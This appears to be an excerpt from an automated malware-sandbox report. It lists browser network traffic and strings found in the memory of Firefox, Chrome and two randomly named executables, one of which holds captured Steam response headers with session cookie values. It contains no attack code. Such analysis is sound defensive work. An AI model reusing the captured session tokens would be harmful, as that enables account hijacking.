Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache

Source: firefox.exe, 0000002C.00000002.2830333086.0000020DC1336000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002C.00000002.2830333086.0000020DC1303000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: "url": "https://www.facebook.com/", equals www.facebook.com (Facebook)
Source: firefox.exe, 0000002C.00000002.2830333086.0000020DC1336000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002C.00000002.2830333086.0000020DC1303000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: "url": "https://www.youtube.com/", equals www.youtube.com (Youtube)
Source: firefox.exe, 0000002C.00000002.2830333086.0000020DC1303000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.facebook.com (Facebook)
Source: firefox.exe, 0000002C.00000002.2830333086.0000020DC1303000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.twitter.com (Twitter)
Source: firefox.exe, 0000002C.00000002.2830333086.0000020DC1303000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.youtube.com (Youtube)
Source: chrome.exe, 00000019.00000002.2806111394.00006AE400732000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2806264599.00006AE40076C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: %https://www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
Source: firefox.exe, 0000002C.00000002.2785004259.0000020DC0503000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ://www.facebook.com/platform/impression.php equals www.facebook.com (Facebook)
Source: firefox.exe, 0000002C.00000002.2785004259.0000020DC0503000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ://www.facebook.com/platform/impression.php://trends.google.com/trends/embed://pixel.advertising.com/firefox-etphttps://ads.stickyadstv.com/firefox-etp://.adsafeprotected.com//Serving/*://.adsafeprotected.com/services/pub*color-mix(in srgb, currentColor 9%, transparent)executeIDB/promise</transaction.oncomplete equals www.facebook.com (Facebook)
Source: firefox.exe, 0000002C.00000002.2830333086.0000020DC1303000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: -l10n-id="newtab-menu-content-tooltip" data-l10n-args="{"title":"Wikipedia"}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.reddit.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="R"><div class="top-site-icon rich-icon" style="background-image:url(chrome://activity-stream/content/data/content/tippytop/images/reddit-com@2x.png)"></div></div></div><div class="title"><span dir="auto">Reddit<span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><div><button aria-haspopup="true" data-l10n-id="newtab-menu-content-tooltip" data-l10n-args="{"title":"Reddit"}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer hide-for-narrow"><div class="top-site-inner"><a class="top-site-button" href="https://twitter.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="T"><div class="top-site-icon rich-icon" style="background-image:url(chrome://activity-stream/content/data/content/tippytop/images/twitter-com@2x.png)"></div></div></div><div class="title"><span dir="auto">Twitter<span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><div><button aria-haspopup="true" data-l10n-id="newtab-menu-content-tooltip" data-l10n-args="{"title":"Twitter"}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer placeholder hide-for-narrow"><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li></ul><div class="edit-topsites-wrapper"></div></div></section></div></div></div></div><style data-styles="[[null]]"></style></div><div class="discovery-stream ds-layout"><div class="ds-column ds-column-12"><div class="ds-column-grid"><div></div></div></div><style data-styles="[[null]]"></style></div></div></main></div></div> equals www.twitter.com (Twitter)
Source: firefox.exe, 0000002C.00000002.2938854910.0000020DC51F4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002C.00000002.2938854910.0000020DC5124000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: 8www.facebook.com equals www.facebook.com (Facebook)
Source: chrome.exe, 00000019.00000002.2806111394.00006AE400732000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2806264599.00006AE40076C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: @https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
Source: a629a70424.exe, 00000018.00000003.2847278204.0000000000E88000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
Source: a629a70424.exe, 00000018.00000003.2847696880.0000000000E38000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Content-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=Nonesessionid=626d386d1f469346cbecf1a1; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 05:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset=UTF-8Content-Type25665Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerPragmaKeep-AliveFri, 13 Dec 2024 17:54:47 GMTDateProxy-ConnectioncloseConnectionno-cacheCache-Control equals www.youtube.com (Youtube)
Source: 3b636bd67f.exe, 00000013.00000003.2240869802.000000000143C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Content-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=Nonesessionid=f756dce55d7f9bac8289d90a; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 05:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset=UTF-8Content-Type25665Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerPragmaKeep-AliveFri, 13 Dec 2024 17:53:46 GMTDateProxy-ConnectioncloseConnectionno-cacheCache-ControlYYd equals www.youtube.com (Youtube)
Source: firefox.exe, 0000002C.00000002.2937991747.0000020DC5007000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: [{incognito:null, tabId:null, types:["image"], urls:["://track.adform.net/Serving/TrackPoint/", "://pixel.advertising.com/firefox-etp", "://.advertising.com/.js", "://.advertising.com/", "://securepubads.g.doubleclick.net/gampad/ad-blk", "://pubads.g.doubleclick.net/gampad/ad-blk", "://securepubads.g.doubleclick.net/gampad/xml_vmap1", "://pubads.g.doubleclick.net/gampad/xml_vmap1", "://vast.adsafeprotected.com/vast", "://securepubads.g.doubleclick.net/gampad/xml_vmap2", "://pubads.g.doubleclick.net/gampad/xml_vmap2", "://securepubads.g.doubleclick.net/gampad/ad", "://pubads.g.doubleclick.net/gampad/ad", "://www.facebook.com/platform/impression.php", "https://ads.stickyadstv.com/firefox-etp", "://ads.stickyadstv.com/auto-user-sync", "://ads.stickyadstv.com/user-matching", "https://static.adsafeprotected.com/firefox-etp-pixel", "://.adsafeprotected.com/.gif", "://.adsafeprotected.com/.png", "://.adsafeprotected.com/.js", "://.adsafeprotected.com//adj", "://.adsafeprotected.com//imp/", "://.adsafeprotected.com//Serving/", "://.adsafeprotected.com//unit/", "://.adsafeprotected.com/jload", "://.adsafeprotected.com/jload?", "://.adsafeprotected.com/jsvid", "://.adsafeprotected.com/jsvid?", "://.adsafeprotected.com/mon", "://.adsafeprotected.com/tpl", "://.adsafeprotected.com/tpl?", "://.adsafeprotected.com/services/pub", "://.adsafeprotected.com/"], windowId:null}, ["blocking"]] equals www.facebook.com (Facebook)
Source: firefox.exe, 0000002C.00000002.2937991747.0000020DC5004000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: [{incognito:null, tabId:null, types:["imageset"], urls:["://track.adform.net/Serving/TrackPoint/", "://pixel.advertising.com/firefox-etp", "://.advertising.com/.js", "://.advertising.com/", "://securepubads.g.doubleclick.net/gampad/ad-blk", "://pubads.g.doubleclick.net/gampad/ad-blk", "://securepubads.g.doubleclick.net/gampad/xml_vmap1", "://pubads.g.doubleclick.net/gampad/xml_vmap1", "://vast.adsafeprotected.com/vast", "://securepubads.g.doubleclick.net/gampad/xml_vmap2", "://pubads.g.doubleclick.net/gampad/xml_vmap2", "://securepubads.g.doubleclick.net/gampad/ad", "://pubads.g.doubleclick.net/gampad/ad", "://www.facebook.com/platform/impression.php", "https://ads.stickyadstv.com/firefox-etp", "://ads.stickyadstv.com/auto-user-sync", "://ads.stickyadstv.com/user-matching", "https://static.adsafeprotected.com/firefox-etp-pixel", "://.adsafeprotected.com/.gif", "://.adsafeprotected.com/.png", "://.adsafeprotected.com/.js", "://.adsafeprotected.com//adj", "://.adsafeprotected.com//imp/", "://.adsafeprotected.com//Serving/", "://.adsafeprotected.com//unit/", "://.adsafeprotected.com/jload", "://.adsafeprotected.com/jload?", "://.adsafeprotected.com/jsvid", "://.adsafeprotected.com/jsvid?", "://.adsafeprotected.com/mon", "://.adsafeprotected.com/tpl", "://.adsafeprotected.com/tpl?", "://.adsafeprotected.com/services/pub", "://.adsafeprotected.com/"], windowId:null}, ["blocking"]] equals www.facebook.com (Facebook)
Source: firefox.exe, 0000002C.00000002.2937991747.0000020DC500C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: [{incognito:null, tabId:null, types:["xmlhttprequest"], urls:["://track.adform.net/Serving/TrackPoint/", "://pagead2.googlesyndication.com/pagead/.jsfcd=true", "://pagead2.googlesyndication.com/pagead/js/.jsfcd=true", "://pixel.advertising.com/firefox-etp", "://cdn.cmp.advertising.com/firefox-etp", "://.advertising.com/.js", "://.advertising.com/", "://securepubads.g.doubleclick.net/gampad/ad-blk", "://pubads.g.doubleclick.net/gampad/ad-blk", "://securepubads.g.doubleclick.net/gampad/xml_vmap1", "://pubads.g.doubleclick.net/gampad/xml_vmap1", "://vast.adsafeprotected.com/vast", "://securepubads.g.doubleclick.net/gampad/xml_vmap2", "://pubads.g.doubleclick.net/gampad/xml_vmap2", "://securepubads.g.doubleclick.net/gampad/ad", "://pubads.g.doubleclick.net/gampad/ad", "://www.facebook.com/platform/impression.php", "https://ads.stickyadstv.com/firefox-etp", "://ads.stickyadstv.com/auto-user-sync", "://ads.stickyadstv.com/user-matching", "https://static.adsafeprotected.com/firefox-etp-pixel", "https://static.adsafeprotected.com/firefox-etp-js", "://.adsafeprotected.com/.gif", "://.adsafeprotected.com/.png", "://.adsafeprotected.com/.js", "://.adsafeprotected.com//adj", "://.adsafeprotected.com//imp/", "://.adsafeprotected.com//Serving/", "://.adsafeprotected.com//unit/", "://.adsafeprotected.com/jload", "://.adsafeprotected.com/jload?", "://.adsafeprotected.com/jsvid", "://.adsafeprotected.com/jsvid?", "://.adsafeprotected.com/mon", "://.adsafeprotected.com/tpl", "://.adsafeprotected.com/tpl?", "://.adsafeprotected.com/services/pub", "://.adsafeprotected.com/*"], windowId:null}, ["blocking"]] equals www.facebook.com (Facebook)
Source: chrome.exe, 00000019.00000003.2381431881.00006AE400F2C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2381344241.00006AE400F7C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2382744868.00006AE400304000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$3()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.dispatchEvent(new CustomEvent("share",{detail:channel}))}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);function getTemplate$2(){return html`<!--_html_template_start_--><style include="cr-hidden-style">:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#shareButton{background-color:var(--ntp-logo-share-button-background-color,none);border:none;height:var(--ntp-logo-share-button-height,0);left:var(--ntp-logo-share-button-x,0);min-width:var(--ntp-logo-share-button-width,0);opacity:.8;outline:initial;padding:2px;position:absolute;top:var(--ntp-logo-share-button-y,0);width:var(--ntp-logo-share-button-width,0)}#shareButton:hover{opacity:1}#shareButton img{height:100%;width:100%}#iframe{border:none;
Source: chrome.exe, 00000019.00000003.2381431881.00006AE400F2C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2381344241.00006AE400F7C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2382744868.00006AE400304000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$3()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.dispatchEvent(new CustomEvent("share",{detail:channel}))}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);function getTemplate$2(){return html`<!--_html_template_start_--><style include="cr-hidden-style">:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#shareButton{background-color:var(--ntp-logo-share-button-background-color,none);border:none;height:var(--ntp-logo-share-button-height,0);left:var(--ntp-logo-share-button-x,0);min-width:var(--ntp-logo-share-button-width,0);opacity:.8;outline:initial;padding:2px;position:absolute;top:var(--ntp-logo-share-button-y,0);width:var(--ntp-logo-share-button-width,0)}#shareButton:hover{opacity:1}#shareButton img{height:100%;width:100%}#iframe{border:none;
Source: a629a70424.exe, 00000018.00000003.2847696880.0000000000E38000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
Source: firefox.exe, 0000002C.00000002.2830333086.0000020DC1336000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: doff-text" data-l10n-args="{"engine": "Google"}"></div><input type="search" class="fake-editable" tabindex="-1" aria-hidden="true"/><div class="fake-caret"></div></button></div></div></div><div class="body-wrapper on"><div class="discovery-stream ds-layout"><div class="ds-column ds-column-12"><div class="ds-column-grid"><div><div class="ds-top-sites"><section class="collapsible-section top-sites" data-section-id="topsites"><div class="section-top-bar"><h3 class="section-title-container " style="visibility:hidden"><span class="section-title"><span data-l10n-id="newtab-section-header-topsites"></span></span><span class="learn-more-link-wrapper"></span></h3></div><div><ul class="top-sites-list"><li class="top-site-outer placeholder "><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer placeholder "><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.youtube.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="Y"><div class="top-site-icon rich-icon" style="background-image:url(chrome://activity-stream/content/data/content/tippytop/images/youtube-com@2x.png)"></div></div></div><div class="title"><span dir="auto">YouTube<span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><div><button aria-haspopup="true" data-l10n-id="newtab-menu-content-tooltip" data-l10n-args="{"title":"YouTube"}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.facebook.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="F"><div class="top-site-icon rich-icon" style="backgroun
Source: firefox.exe, 0000002C.00000002.2830333086.0000020DC1336000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: doff-text" data-l10n-args="{"engine": "Google"}"></div><input type="search" class="fake-editable" tabindex="-1" aria-hidden="true"/><div class="fake-caret"></div></button></div></div></div><div class="body-wrapper on"><div class="discovery-stream ds-layout"><div class="ds-column ds-column-12"><div class="ds-column-grid"><div><div class="ds-top-sites"><section class="collapsible-section top-sites" data-section-id="topsites"><div class="section-top-bar"><h3 class="section-title-container " style="visibility:hidden"><span class="section-title"><span data-l10n-id="newtab-section-header-topsites"></span></span><span class="learn-more-link-wrapper"></span></h3></div><div><ul class="top-sites-list"><li class="top-site-outer placeholder "><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer placeholder "><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.youtube.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="Y"><div class="top-site-icon rich-icon" style="background-image:url(chrome://activity-stream/content/data/content/tippytop/images/youtube-com@2x.png)"></div></div></div><div class="title"><span dir="auto">YouTube<span class="sponsored-label" 